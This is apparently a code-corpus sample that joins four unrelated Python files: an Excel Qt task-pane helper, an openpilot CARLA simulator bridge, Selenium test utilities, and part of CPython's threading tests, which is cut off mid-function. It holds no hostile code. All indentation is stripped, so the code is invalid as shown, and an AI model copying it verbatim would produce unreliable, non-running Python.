|
qtgui.py
|
import threading
import queue
from ._common import *
from . import _core
from .excelgui import CustomTaskPane
import importlib
import sys
import concurrent.futures as futures
import concurrent.futures.thread
def _qt_import(sub, what):
"""
Helper function to import Q objects from PyQt or PySide depending
on which framework had already been imported
"""
if 'PyQt5' in sys.modules:
top = 'PyQt5'
elif 'PySide2' in sys.modules:
top = 'PySide2'
else:
raise ImportError("Import PyQt or PySide before invoking this function")
if isinstance(what, str):
mod = __import__(top + '.' + sub, globals(), locals(), [what], 0)
return getattr(mod, what)
else:
mod = __import__(top + '.' + sub, globals(), locals(), what, 0)
return [getattr(mod, x) for x in what]
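# A minimal usage sketch (hypothetical class names), valid once PyQt5 or
# PySide2 has already been imported:
#   QLabel = _qt_import('QtWidgets', 'QLabel')
#   QTimer, QObject = _qt_import('QtCore', ['QTimer', 'QObject'])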
def _create_Qt_app():
QApplication = _qt_import('QtWidgets', 'QApplication')
# Qt seems to really battle with reading environment variables. So we must
# read the variable ourselves, then pass it as an argument. It's unclear what
# alchemy is required to make Qt do this seemingly simple thing.
import os
ppp = os.getenv('QT_QPA_PLATFORM_PLUGIN_PATH', None)
app = QApplication([] if ppp is None else ['','-platformpluginpath', ppp])
log(f"Started Qt on thread {threading.get_native_id()}" +
f"with libpaths={app.libraryPaths()}", level="info")
return app
def _reparent_widget(widget, hwnd):
QWindow = _qt_import('QtGui', 'QWindow')
# windowHandle does not exist before show
widget.show()
nativeWindow = QWindow.fromWinId(hwnd)
widget.windowHandle().setParent(nativeWindow)
widget.update()
widget.move(0, 0)
class QtExecutor(futures.Executor):
def __init__(self):
self._work_queue = queue.SimpleQueue()
self._thread = threading.Thread(target=self._main_loop, name="QtGuiThread")
self._broken = False
self._work_signal = None
self._thread.start()
def submit(self, fn, *args, **kwargs):
if self._broken:
raise futures.BrokenExecutor(self._broken)
f = futures.Future()
w = concurrent.futures.thread._WorkItem(f, fn, args, kwargs)
self._work_queue.put(w)
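# Wake the Qt event loop, if it is already running, so the new work
# item is processed promptly rather than waiting for the next timeout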
if self._work_signal is not None:
self._work_signal.timeout.emit()
return f
def shutdown(self, wait=True, cancel_futures=False):
if not self._broken:
self.submit(self.app.quit)
def _do_work(self):
try:
while True:
work_item = self._work_queue.get_nowait()
if work_item is not None:
work_item.run()
del work_item
except queue.Empty:
return
def _main_loop(self):
try:
self.app = _create_Qt_app()
QTimer = _qt_import('QtCore', 'QTimer')
semaphore = QTimer()
semaphore.timeout.connect(self._do_work)
self._work_signal = semaphore
# Trigger timer to run any pending queue items now
semaphore.timeout.emit()
# Thread main loop, run until quit
self.app.exec()
# Thread cleanup
self.app = None
self._work_signal = None  # stop submit() from signalling the dead QTimer
self._broken = True
except Exception as e:
self._broken = True
log(f"QtThread failed: {e}", level='error')
_Qt_thread = None
def Qt_thread() -> futures.Executor:
"""
All Qt GUI interactions (except signals) must take place on the thread
that the *QApplication* object was created on. This object is a
*concurrent.futures.Executor* which executes commands on the dedicated
Qt thread. **All Qt interaction must take place via this thread**.
Examples
--------
::
future = Qt_thread().submit(my_func, my_args)
future.result() # blocks
"""
global _Qt_thread
if _Qt_thread is None:
_Qt_thread = QtExecutor()
# PyBye is called before `threading` module teardown, whereas `atexit` comes later
_core.event.PyBye += _Qt_thread.shutdown
# Send this blocking no-op to ensure QApplication is created on our thread
# before we proceed, otherwise Qt may try to create one elsewhere
_Qt_thread.submit(lambda: 0).result()
return _Qt_thread
class QtThreadTaskPane(CustomTaskPane):
"""
Wraps a Qt QWidget to create a CustomTaskPane object.
"""
def __init__(self, pane, draw_widget):
"""
Wraps a QWidget to create a CustomTaskPane object. The ``draw_widget`` function
is executed on the `xloil.qtgui.Qt_thread` and is expected to return a *QWidget* object.
"""
super().__init__(pane)
def draw_it(hwnd):
widget = draw_widget()
_reparent_widget(widget, hwnd)
return widget
self.widget = Qt_thread().submit(draw_it, self.pane.parent_hwnd).result() # Blocks
def on_size(self, width, height):
Qt_thread().submit(lambda: self.widget.resize(width, height))
def on_visible(self, c):
Qt_thread().submit(lambda: self.widget.show() if c else self.widget.hide())
def on_destroy(self):
Qt_thread().submit(lambda: self.widget.destroy())
super().on_destroy()
def _try_create_qt_pane(obj):
try:
QWidget = _qt_import('QtWidgets', 'QWidget')
if issubclass(obj, QWidget):
return lambda pane: QtThreadTaskPane(pane, obj)
except ImportError:
pass
return None
|
bridge.py
|
#!/usr/bin/env python3
import os
import time
import math
import atexit
import numpy as np
import threading
import random
import cereal.messaging as messaging
import argparse
from common.params import Params
from common.realtime import Ratekeeper
from lib.can import can_function, sendcan_function
import queue
parser = argparse.ArgumentParser(description='Bridge between CARLA and openpilot.')
parser.add_argument('--autopilot', action='store_true')
args = parser.parse_args()
pm = messaging.PubMaster(['frame', 'sensorEvents', 'can'])
W,H = 1164, 874
def cam_callback(image):
img = np.frombuffer(image.raw_data, dtype=np.dtype("uint8"))
img = np.reshape(img, (H, W, 4))
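# keep only channels 0-2: the simulator delivers 4-channel BGRA frames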
img = img[:, :, [0,1,2]].copy()
dat = messaging.new_message()
dat.init('frame')
dat.frame = {
"frameId": image.frame,
"image": img.tostring(),
}
pm.send('frame', dat)
def imu_callback(imu):
#print(imu, imu.accelerometer)
dat = messaging.new_message()
dat.init('sensorEvents', 2)
dat.sensorEvents[0].sensor = 4
dat.sensorEvents[0].type = 0x10
dat.sensorEvents[0].init('acceleration')
dat.sensorEvents[0].acceleration.v = [imu.accelerometer.x, imu.accelerometer.y, imu.accelerometer.z]
# copied these numbers from locationd
dat.sensorEvents[1].sensor = 5
dat.sensorEvents[1].type = 0x10
dat.sensorEvents[1].init('gyroUncalibrated')
dat.sensorEvents[1].gyroUncalibrated.v = [imu.gyroscope.x, imu.gyroscope.y, imu.gyroscope.z]
pm.send('sensorEvents', dat)
def health_function():
pm = messaging.PubMaster(['health'])
rk = Ratekeeper(1.0)
while 1:
dat = messaging.new_message()
dat.init('health')
dat.valid = True
dat.health = {
'ignitionLine': True,
'hwType': "whitePanda",
'controlsAllowed': True
}
pm.send('health', dat)
rk.keep_time()
def fake_driver_monitoring():
pm = messaging.PubMaster(['driverState'])
while 1:
dat = messaging.new_message()
dat.init('driverState')
dat.driverState.faceProb = 1.0
pm.send('driverState', dat)
time.sleep(0.1)
def go():
import carla
client = carla.Client("127.0.0.1", 2000)
client.set_timeout(5.0)
world = client.load_world('Town03')
settings = world.get_settings()
settings.fixed_delta_seconds = 0.05
world.apply_settings(settings)
weather = carla.WeatherParameters(
cloudyness=0.0,
precipitation=0.0,
precipitation_deposits=0.0,
wind_intensity=0.0,
sun_azimuth_angle=0.0,
sun_altitude_angle=0.0)
world.set_weather(weather)
blueprint_library = world.get_blueprint_library()
"""
for blueprint in blueprint_library.filter('sensor.*'):
print(blueprint.id)
exit(0)
"""
world_map = world.get_map()
vehicle_bp = random.choice(blueprint_library.filter('vehicle.bmw.*'))
vehicle = world.spawn_actor(vehicle_bp, random.choice(world_map.get_spawn_points()))
if args.autopilot:
vehicle.set_autopilot(True)
blueprint = blueprint_library.find('sensor.camera.rgb')
blueprint.set_attribute('image_size_x', str(W))
blueprint.set_attribute('image_size_y', str(H))
blueprint.set_attribute('fov', '70')
blueprint.set_attribute('sensor_tick', '0.05')
transform = carla.Transform(carla.Location(x=0.8, z=1.45))
camera = world.spawn_actor(blueprint, transform, attach_to=vehicle)
camera.listen(cam_callback)
# TODO: wait for carla 0.9.7
imu_bp = blueprint_library.find('sensor.other.imu')
imu = world.spawn_actor(imu_bp, transform, attach_to=vehicle)
imu.listen(imu_callback)
def destroy():
print("clean exit")
imu.destroy()
camera.destroy()
vehicle.destroy()
print("done")
atexit.register(destroy)
# can loop
sendcan = messaging.sub_sock('sendcan')
rk = Ratekeeper(100)
steer_angle = 0
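# 100 Hz loop: publish simulated CAN every tick; read back controls every 5th tick (20 Hz)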
while 1:
vel = vehicle.get_velocity()
speed = math.sqrt(vel.x**2 + vel.y**2 + vel.z**2)
can_function(pm, speed, steer_angle, rk.frame, rk.frame%500 == 499)
if rk.frame%5 == 0:
throttle, brake, steer = sendcan_function(sendcan)
steer_angle += steer/10000.0 # torque
vc = carla.VehicleControl(throttle=throttle, steer=steer_angle, brake=brake)
vehicle.apply_control(vc)
print(speed, steer_angle, vc)
rk.keep_time()
if __name__ == "__main__":
params = Params()
params.delete("Offroad_ConnectivityNeeded")
from selfdrive.version import terms_version, training_version
params.put("HasAcceptedTerms", terms_version)
params.put("CompletedTrainingVersion", training_version)
params.put("CommunityFeaturesToggle", "1")
threading.Thread(target=health_function).start()
threading.Thread(target=fake_driver_monitoring).start()
# no carla, still run
try:
import carla
except ImportError:
print("WARNING: NO CARLA")
while 1:
time.sleep(1)
go()
|
base.py
|
"""
Base functions for tests.
"""
import os
import socketserver
import threading
import unittest
from contextlib import contextmanager
from functools import wraps
from http.server import SimpleHTTPRequestHandler
from time import sleep
from selenium import webdriver
from aloe.testing import in_directory
def feature(fails=False):
"""
Decorate a test method to test the feature contained in its docstring.
For example:
@feature(fails=False)
def test_some_feature(self):
'''
When I ...
Then I ...
'''
The method code is ignored.
"""
def outer(func):
"""
A decorator to run the function as the feature contained in docstring.
"""
@wraps(func)
@in_directory(os.path.dirname(__file__))
def inner(self):
"""Run the scenario from docstring."""
scenario = func.__doc__
# Make it possible to reference SERVER_HOST in URLs inside
# scenarios
scenario = scenario.replace(
'SERVER_HOST',
os.environ.get('SERVER_HOST', '0.0.0.0')
)
feature_string = """
Feature: {name}
Scenario: {name}
{scenario_string}
""".format(name=func.__name__, scenario_string=scenario)
result = self.run_feature_string(feature_string)
if fails:
self.assertFalse(result.success)
else:
self.assertTrue(result.success)
return inner
return outer
class TestRequestHandler(SimpleHTTPRequestHandler):
"""A handler serving the test pages."""
def translate_path(self, path):
"""Serve the pages directory instead of the current directory."""
pages_dir = os.path.relpath(
os.path.join(os.path.dirname(__file__), 'html_pages'))
return SimpleHTTPRequestHandler.translate_path(
self, '/' + pages_dir + path)
def do_GET(self):
"""
Artificially slow down the response to make sure there are no race
conditions.
"""
sleep(0.5)
return SimpleHTTPRequestHandler.do_GET(self)
def log_message(self, *args, **kwargs): # pylint:disable=arguments-differ
"""Turn off logging."""
pass
class TestServer(socketserver.TCPServer):
"""Server for the test pages."""
allow_reuse_address = True
def get_request(self):
"""Set a timeout on the request socket."""
request, addr = socketserver.TCPServer.get_request(self)
request.settimeout(2) # pylint:disable=no-member
return request, addr
@contextmanager
def test_server():
"""A context manager starting a server for the test pages."""
port = 7755
server = TestServer(('', port), TestRequestHandler)
server_thread = threading.Thread(target=server.serve_forever)
server_thread.start()
# When running the browser in Docker, pass the host address
# to allow the container to access the server on the host
if 'SERVER_HOST' in os.environ:
address = (os.environ['SERVER_HOST'], port)
else:
address = server.server_address
yield server, address
server.shutdown()
server_thread.join()
server.server_close()
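# A minimal usage sketch (assuming some page exists under html_pages):
#   with test_server() as (server, (host, port)):
#       url = 'http://%s:%s/some_page.html' % (host, port)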
def browser_type():
"""Browser type selected for the tests."""
return os.environ.get('BROWSER_TYPE', 'firefox')
def skip_if_browser(browsers, message):
"""Decorator to skip a test with a particular browser type."""
if not isinstance(browsers, (list, tuple)):
browsers = [browsers]
if browser_type() in browsers:
return unittest.skip(message)
return lambda func: func
def create_browser():
"""Create a Selenium browser for tests."""
if 'SELENIUM_ADDRESS' in os.environ:
address = 'http://{}/wd/hub'.format(os.environ['SELENIUM_ADDRESS'])
capabilities = {
'chrome': webdriver.DesiredCapabilities.CHROME,
'firefox': webdriver.DesiredCapabilities.FIREFOX,
'phantomjs': webdriver.DesiredCapabilities.PHANTOMJS,
}
try:
browser = capabilities[browser_type()]
except KeyError:
raise ValueError("Invalid BROWSER_TYPE.")
return webdriver.Remote(
address,
desired_capabilities=browser,
)
browsers = {
'chrome': webdriver.Chrome,
'firefox': webdriver.Firefox,
'phantomjs': webdriver.PhantomJS,
}
driver = browsers[browser_type()]
# Explicitly specify the browser locale for the date input tests to work
# regardless of the user's settings
old_lc_all = os.environ.get('LC_ALL', '')
try:
os.environ['LC_ALL'] = 'en_US'
return driver()
finally:
os.environ['LC_ALL'] = old_lc_all
|
test_threading.py
|
"""
Tests for the threading module.
"""
import test.support
from test.support import threading_helper
from test.support import verbose, import_module, cpython_only
from test.support.script_helper import assert_python_ok, assert_python_failure
import random
import sys
import _thread
import threading
import time
import unittest
import weakref
import os
import subprocess
import signal
import textwrap
from test import lock_tests
from test import support
# Between fork() and exec(), only async-safe functions are allowed (issues
# #12316 and #11870), and fork() from a worker thread is known to trigger
# problems with some operating systems (issue #3863): skip problematic tests
# on platforms known to behave badly.
platforms_to_skip = ('netbsd5', 'hp-ux11')
# A trivial mutable counter.
class Counter(object):
def __init__(self):
self.value = 0
def inc(self):
self.value += 1
def dec(self):
self.value -= 1
def get(self):
return self.value
class TestThread(threading.Thread):
def __init__(self, name, testcase, sema, mutex, nrunning):
threading.Thread.__init__(self, name=name)
self.testcase = testcase
self.sema = sema
self.mutex = mutex
self.nrunning = nrunning
def run(self):
delay = random.random() / 10000.0
if verbose:
print('task %s will run for %.1f usec' %
(self.name, delay * 1e6))
with self.sema:
with self.mutex:
self.nrunning.inc()
if verbose:
print(self.nrunning.get(), 'tasks are running')
self.testcase.assertLessEqual(self.nrunning.get(), 3)
time.sleep(delay)
if verbose:
print('task', self.name, 'done')
with self.mutex:
self.nrunning.dec()
self.testcase.assertGreaterEqual(self.nrunning.get(), 0)
if verbose:
print('%s is finished. %d tasks are running' %
(self.name, self.nrunning.get()))
class BaseTestCase(unittest.TestCase):
def setUp(self):
self._threads = threading_helper.threading_setup()
def tearDown(self):
threading_helper.threading_cleanup(*self._threads)
test.support.reap_children()
class ThreadTests(BaseTestCase):
# Create a bunch of threads, let each do some work, wait until all are
# done.
def test_various_ops(self):
# This takes about n/3 seconds to run (about n/3 clumps of tasks,
# times about 1 second per clump).
NUMTASKS = 10
# no more than 3 of the 10 can run at once
sema = threading.BoundedSemaphore(value=3)
mutex = threading.RLock()
numrunning = Counter()
threads = []
for i in range(NUMTASKS):
t = TestThread("<thread %d>"%i, self, sema, mutex, numrunning)
threads.append(t)
self.assertIsNone(t.ident)
self.assertRegex(repr(t), r'^<TestThread\(.*, initial\)>$')
t.start()
if hasattr(threading, 'get_native_id'):
native_ids = set(t.native_id for t in threads) | {threading.get_native_id()}
self.assertNotIn(None, native_ids)
self.assertEqual(len(native_ids), NUMTASKS + 1)
if verbose:
print('waiting for all tasks to complete')
for t in threads:
t.join()
self.assertFalse(t.is_alive())
self.assertNotEqual(t.ident, 0)
self.assertIsNotNone(t.ident)
self.assertRegex(repr(t), r'^<TestThread\(.*, stopped -?\d+\)>$')
if verbose:
print('all tasks done')
self.assertEqual(numrunning.get(), 0)
def test_ident_of_no_threading_threads(self):
# The ident still must work for the main thread and dummy threads.
self.assertIsNotNone(threading.currentThread().ident)
def f():
ident.append(threading.currentThread().ident)
done.set()
done = threading.Event()
ident = []
with threading_helper.wait_threads_exit():
tid = _thread.start_new_thread(f, ())
done.wait()
self.assertEqual(ident[0], tid)
# Kill the "immortal" _DummyThread
del threading._active[ident[0]]
# run with a small(ish) thread stack size (256 KiB)
def test_various_ops_small_stack(self):
if verbose:
print('with 256 KiB thread stack size...')
try:
threading.stack_size(262144)
except _thread.error:
raise unittest.SkipTest(
'platform does not support changing thread stack size')
self.test_various_ops()
threading.stack_size(0)
# run with a large thread stack size (1 MiB)
def test_various_ops_large_stack(self):
if verbose:
print('with 1 MiB thread stack size...')
try:
threading.stack_size(0x100000)
except _thread.error:
raise unittest.SkipTest(
'platform does not support changing thread stack size')
self.test_various_ops()
threading.stack_size(0)
def test_foreign_thread(self):
# Check that a "foreign" thread can use the threading module.
def f(mutex):
# Calling current_thread() forces an entry for the foreign
# thread to get made in the threading._active map.
threading.current_thread()
mutex.release()
mutex = threading.Lock()
mutex.acquire()
with threading_helper.wait_threads_exit():
tid = _thread.start_new_thread(f, (mutex,))
# Wait for the thread to finish.
mutex.acquire()
self.assertIn(tid, threading._active)
self.assertIsInstance(threading._active[tid], threading._DummyThread)
# Issue 29376
self.assertTrue(threading._active[tid].is_alive())
self.assertRegex(repr(threading._active[tid]), '_DummyThread')
del threading._active[tid]
# PyThreadState_SetAsyncExc() is a CPython-only gimmick, not (currently)
# exposed at the Python level. This test relies on ctypes to get at it.
def test_PyThreadState_SetAsyncExc(self):
ctypes = import_module("ctypes")
set_async_exc = ctypes.pythonapi.PyThreadState_SetAsyncExc
set_async_exc.argtypes = (ctypes.c_ulong, ctypes.py_object)
class AsyncExc(Exception):
pass
exception = ctypes.py_object(AsyncExc)
# First check it works when setting the exception from the same thread.
tid = threading.get_ident()
self.assertIsInstance(tid, int)
self.assertGreater(tid, 0)
try:
result = set_async_exc(tid, exception)
# The exception is async, so we might have to keep the VM busy until
# it notices.
while True:
pass
except AsyncExc:
pass
else:
# This code is unreachable but it reflects the intent. If we wanted
# to be smarter the above loop wouldn't be infinite.
self.fail("AsyncExc not raised")
try:
self.assertEqual(result, 1) # one thread state modified
except UnboundLocalError:
# The exception was raised too quickly for us to get the result.
pass
# `worker_started` is set by the thread when it's inside a try/except
# block waiting to catch the asynchronously set AsyncExc exception.
# `worker_saw_exception` is set by the thread upon catching that
# exception.
worker_started = threading.Event()
worker_saw_exception = threading.Event()
class Worker(threading.Thread):
def run(self):
self.id = threading.get_ident()
self.finished = False
try:
while True:
worker_started.set()
time.sleep(0.1)
except AsyncExc:
self.finished = True
worker_saw_exception.set()
t = Worker()
t.daemon = True # so if this fails, we don't hang Python at shutdown
t.start()
if verbose:
print(" started worker thread")
# Try a thread id that doesn't make sense.
if verbose:
print(" trying nonsensical thread id")
result = set_async_exc(-1, exception)
self.assertEqual(result, 0) # no thread states modified
# Now raise an exception in the worker thread.
if verbose:
print(" waiting for worker thread to get started")
ret = worker_started.wait()
self.assertTrue(ret)
if verbose:
print(" verifying worker hasn't exited")
self.assertFalse(t.finished)
if verbose:
print(" attempting to raise asynch exception in worker")
result = set_async_exc(t.id, exception)
self.assertEqual(result, 1) # one thread state modified
if verbose:
print(" waiting for worker to say it caught the exception")
worker_saw_exception.wait(timeout=support.SHORT_TIMEOUT)
self.assertTrue(t.finished)
if verbose:
print(" all OK -- joining worker")
if t.finished:
t.join()
# else the thread is still running, and we have no way to kill it
def test_limbo_cleanup(self):
# Issue 7481: Failure to start thread should cleanup the limbo map.
def fail_new_thread(*args):
raise threading.ThreadError()
_start_new_thread = threading._start_new_thread
threading._start_new_thread = fail_new_thread
try:
t = threading.Thread(target=lambda: None)
self.assertRaises(threading.ThreadError, t.start)
self.assertFalse(
t in threading._limbo,
"Failed to cleanup _limbo map on failure of Thread.start().")
finally:
threading._start_new_thread = _start_new_thread
def test_finalize_running_thread(self):
# Issue 1402: the PyGILState_Ensure / _Release functions may be called
# very late on python exit: on deallocation of a running thread for
# example.
import_module("ctypes")
rc, out, err = assert_python_failure("-c", """if 1:
import ctypes, sys, time, _thread
# This lock is used as a simple event variable.
ready = _thread.allocate_lock()
ready.acquire()
# Module globals are cleared before __del__ is run
# So we save the functions in class dict
class C:
ensure = ctypes.pythonapi.PyGILState_Ensure
release = ctypes.pythonapi.PyGILState_Release
def __del__(self):
state = self.ensure()
self.release(state)
def waitingThread():
x = C()
ready.release()
time.sleep(100)
_thread.start_new_thread(waitingThread, ())
ready.acquire() # Be sure the other thread is waiting.
sys.exit(42)
""")
self.assertEqual(rc, 42)
def test_finalize_with_trace(self):
# Issue1733757
# Avoid a deadlock when sys.settrace steps into threading._shutdown
assert_python_ok("-c", """if 1:
import sys, threading
# A deadlock-killer, to prevent the
# testsuite to hang forever
def killer():
import os, time
time.sleep(2)
print('program blocked; aborting')
os._exit(2)
t = threading.Thread(target=killer)
t.daemon = True
t.start()
# This is the trace function
def func(frame, event, arg):
threading.current_thread()
return func
sys.settrace(func)
""")
def test_join_nondaemon_on_shutdown(self):
# Issue 1722344
# Raising SystemExit skipped threading._shutdown
rc, out, err = assert_python_ok("-c", """if 1:
import threading
from time import sleep
def child():
sleep(1)
# As a non-daemon thread we SHOULD wake up and nothing
# should be torn down yet
print("Woke up, sleep function is:", sleep)
threading.Thread(target=child).start()
raise SystemExit
""")
self.assertEqual(out.strip(),
b"Woke up, sleep function is: <built-in function sleep>")
self.assertEqual(err, b"")
def test_enumerate_after_join(self):
# Try hard to trigger #1703448: a thread is still returned in
# threading.enumerate() after it has been join()ed.
enum = threading.enumerate
old_interval = sys.getswitchinterval()
try:
for i in range(1, 100):
sys.setswitchinterval(i * 0.0002)
t = threading.Thread(target=lambda: None)
t.start()
t.join()
l = enum()
self.assertNotIn(t, l,
"#1703448 triggered after %d trials: %s" % (i, l))
finally:
sys.setswitchinterval(old_interval)
def test_no_refcycle_through_target(self):
class RunSelfFunction(object):
def __init__(self, should_raise):
# The links in this refcycle from Thread back to self
# should be cleaned up when the thread completes.
self.should_raise = should_raise
self.thread = threading.Thread(target=self._run,
args=(self,),
kwargs={'yet_another':self})
self.thread.start()
def _run(self, other_ref, yet_another):
if self.should_raise:
raise SystemExit
cyclic_object = RunSelfFunction(should_raise=False)
weak_cyclic_object = weakref.ref(cyclic_object)
cyclic_object.thread.join()
del cyclic_object
self.assertIsNone(weak_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_cyclic_object())))
raising_cyclic_object = RunSelfFunction(should_raise=True)
weak_raising_cyclic_object = weakref.ref(raising_cyclic_object)
raising_cyclic_object.thread.join()
del raising_cyclic_object
self.assertIsNone(weak_raising_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_raising_cyclic_object())))
def test_old_threading_api(self):
# Just a quick sanity check to make sure the old method names are
# still present
t = threading.Thread()
t.isDaemon()
t.setDaemon(True)
t.getName()
t.setName("name")
e = threading.Event()
e.isSet()
threading.activeCount()
def test_repr_daemon(self):
t = threading.Thread()
self.assertNotIn('daemon', repr(t))
t.daemon = True
self.assertIn('daemon', repr(t))
def test_daemon_param(self):
t = threading.Thread()
self.assertFalse(t.daemon)
t = threading.Thread(daemon=False)
self.assertFalse(t.daemon)
t = threading.Thread(daemon=True)
self.assertTrue(t.daemon)
@unittest.skipUnless(hasattr(os, 'fork'), 'test needs fork()')
def test_dummy_thread_after_fork(self):
# Issue #14308: a dummy thread in the active list doesn't mess up
# the after-fork mechanism.
code = """if 1:
import _thread, threading, os, time
def background_thread(evt):
# Creates and registers the _DummyThread instance
threading.current_thread()
evt.set()
time.sleep(10)
evt = threading.Event()
_thread.start_new_thread(background_thread, (evt,))
evt.wait()
assert threading.active_count() == 2, threading.active_count()
if os.fork() == 0:
assert threading.active_count() == 1, threading.active_count()
os._exit(0)
else:
os.wait()
"""
_, out, err = assert_python_ok("-c", code)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
def test_is_alive_after_fork(self):
# Try hard to trigger #18418: is_alive() could sometimes be True on
# threads that vanished after a fork.
old_interval = sys.getswitchinterval()
self.addCleanup(sys.setswitchinterval, old_interval)
# Make the bug more likely to manifest.
test.support.setswitchinterval(1e-6)
for i in range(20):
t = threading.Thread(target=lambda: None)
t.start()
pid = os.fork()
if pid == 0:
os._exit(11 if t.is_alive() else 10)
else:
t.join()
support.wait_process(pid, exitcode=10)
def test_main_thread(self):
main = threading.main_thread()
self.assertEqual(main.name, 'MainThread')
self.assertEqual(main.ident, threading.current_thread().ident)
self.assertEqual(main.ident, threading.get_ident())
def f():
self.assertNotEqual(threading.main_thread().ident,
threading.current_thread().ident)
th = threading.Thread(target=f)
th.start()
th.join()
@unittest.skipUnless(hasattr(os, 'fork'), "test needs os.fork()")
@unittest.skipUnless(hasattr(os, 'waitpid'), "test needs os.waitpid()")
def test_main_thread_after_fork(self):
code = """if 1:
import os, threading
from test import support
pid = os.fork()
if pid == 0:
main = threading.main_thread()
print(main.name)
print(main.ident == threading.current_thread().ident)
print(main.ident == threading.get_ident())
else:
support.wait_process(pid, exitcode=0)
"""
_, out, err = assert_python_ok("-c", code)
data = out.decode().replace('\r', '')
self.assertEqual(err, b"")
self.assertEqual(data, "MainThread\nTrue\nTrue\n")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
@unittest.skipUnless(hasattr(os, 'fork'), "test needs os.fork()")
@unittest.skipUnless(hasattr(os, 'waitpid'), "test needs os.waitpid()")
def test_main_thread_after_fork_from_nonmain_thread(self):
code = """if 1:
import os, threading, sys
from test import support
def f():
pid = os.fork()
if pid == 0:
main = threading.main_thread()
print(main.name)
print(main.ident == threading.current_thread().ident)
print(main.ident == threading.get_ident())
# stdout is fully buffered because not a tty,
# we have to flush before exit.
sys.stdout.flush()
else:
support.wait_process(pid, exitcode=0)
th = threading.Thread(target=f)
th.start()
th.join()
"""
_, out, err = assert_python_ok("-c", code)
data = out.decode().replace('\r', '')
self.assertEqual(err, b"")
self.assertEqual(data, "Thread-1\nTrue\nTrue\n")
def test_main_thread_during_shutdown(self):
# bpo-31516: current_thread() should still point to the main thread
# at shutdown
code = """if 1:
import gc, threading
main_thread = threading.current_thread()
assert main_thread is threading.main_thread() # sanity check
class RefCycle:
def __init__(self):
self.cycle = self
def __del__(self):
print("GC:",
threading.current_thread() is main_thread,
threading.main_thread() is main_thread,
threading.enumerate() == [main_thread])
RefCycle()
gc.collect() # sanity check
x = RefCycle()
"""
_, out, err = assert_python_ok("-c", code)
data = out.decode()
self.assertEqual(err, b"")
self.assertEqual(data.splitlines(),
["GC: True True True"] * 2)
def test_finalization_shutdown(self):
# bpo-36402: Py_Finalize() calls threading._shutdown() which must wait
# until Python thread states of all non-daemon threads get deleted.
#
# Test similar to SubinterpThreadingTests.test_threads_join_2(), but
# test the finalization of the main interpreter.
code = """if 1:
import os
import threading
import time
import random
def random_sleep():
seconds = random.random() * 0.010
time.sleep(seconds)
class Sleeper:
def __del__(self):
random_sleep()
tls = threading.local()
def f():
# Sleep a bit so that the thread is still running when
# Py_Finalize() is called.
random_sleep()
tls.x = Sleeper()
random_sleep()
threading.Thread(target=f).start()
random_sleep()
"""
rc, out, err = assert_python_ok("-c", code)
self.assertEqual(err, b"")
def test_tstate_lock(self):
# Test an implementation detail of Thread objects.
started = _thread.allocate_lock()
finish = _thread.allocate_lock()
started.acquire()
finish.acquire()
def f():
started.release()
finish.acquire()
time.sleep(0.01)
# The tstate lock is None until the thread is started
t = threading.Thread(target=f)
self.assertIs(t._tstate_lock, None)
t.start()
started.acquire()
self.assertTrue(t.is_alive())
# The tstate lock can't be acquired when the thread is running
# (or suspended).
tstate_lock = t._tstate_lock
self.assertFalse(tstate_lock.acquire(timeout=0), False)
finish.release()
# When the thread ends, the state_lock can be successfully
# acquired.
self.assertTrue(tstate_lock.acquire(timeout=support.SHORT_TIMEOUT), False)
# But is_alive() is still True: we hold _tstate_lock now, which
# prevents is_alive() from knowing the thread's end-of-life C code
# is done.
self.assertTrue(t.is_alive())
# Let is_alive() find out the C code is done.
tstate_lock.release()
self.assertFalse(t.is_alive())
# And verify the thread disposed of _tstate_lock.
self.assertIsNone(t._tstate_lock)
t.join()
def test_repr_stopped(self):
# Verify that "stopped" shows up in repr(Thread) appropriately.
started = _thread.allocate_lock()
finish = _thread.allocate_lock()
started.acquire()
finish.acquire()
def f():
started.release()
finish.acquire()
t = threading.Thread(target=f)
t.start()
started.acquire()
self.assertIn("started", repr(t))
finish.release()
# "stopped" should appear in the repr in a reasonable amount of time.
# Implementation detail: as of this writing, that's trivially true
# if .join() is called, and almost trivially true if .is_alive() is
# called. The detail we're testing here is that "stopped" shows up
# "all on its own".
LOOKING_FOR = "stopped"
for i in range(500):
if LOOKING_FOR in repr(t):
break
time.sleep(0.01)
self.assertIn(LOOKING_FOR, repr(t)) # we waited at least 5 seconds
t.join()
def test_BoundedSemaphore_limit(self):
# BoundedSemaphore should raise ValueError if released too often.
for limit in range(1, 10):
bs = threading.BoundedSemaphore(limit)
threads = [threading.Thread(target=bs.acquire)
for _ in range(limit)]
for t in threads:
t.start()
for t in threads:
t.join()
threads = [threading.Thread(target=bs.release)
for _ in range(limit)]
for t in threads:
t.start()
for t in threads:
t.join()
self.assertRaises(ValueError, bs.release)
@cpython_only
def test_frame_tstate_tracing(self):
# Issue #14432: Crash when a generator is created in a C thread that is
# destroyed while the generator is still used. The issue was that a
# generator contains a frame, and the frame kept a reference to the
# Python state of the destroyed C thread. The crash occurs when a trace
# function is setup.
def noop_trace(frame, event, arg):
# no operation
return noop_trace
def generator():
while 1:
yield "generator"
def callback():
if callback.gen is None:
callback.gen = generator()
return next(callback.gen)
callback.gen = None
old_trace = sys.gettrace()
sys.settrace(noop_trace)
try:
# Install a trace function
threading.settrace(noop_trace)
# Create a generator in a C thread which exits after the call
import _testcapi
_testcapi.call_in_temporary_c_thread(callback)
# Call the generator in a different Python thread, check that the
# generator didn't keep a reference to the destroyed thread state
for test in range(3):
# The trace function is still called here
callback()
finally:
sys.settrace(old_trace)
@cpython_only
def test_shutdown_locks(self):
for daemon in (False, True):
with self.subTest(daemon=daemon):
event = threading.Event()
thread = threading.Thread(target=event.wait, daemon=daemon)
# Thread.start() must add lock to _shutdown_locks,
# but only for non-daemon thread
thread.start()
tstate_lock = thread._tstate_lock
if not daemon:
self.assertIn(tstate_lock, threading._shutdown_locks)
else:
self.assertNotIn(tstate_lock, threading._shutdown_locks)
# unblock the thread and join it
event.set()
thread.join()
# Thread._stop() must remove tstate_lock from _shutdown_locks.
# Daemon threads must never add it to _shutdown_locks.
self.assertNotIn(tstate_lock, threading._shutdown_locks)
def test_locals_at_exit(self):
# bpo-19466: thread locals must not be deleted before destructors
# are called
rc, out, err = assert_python_ok("-c", """if 1:
import threading
class Atexit:
def __del__(self):
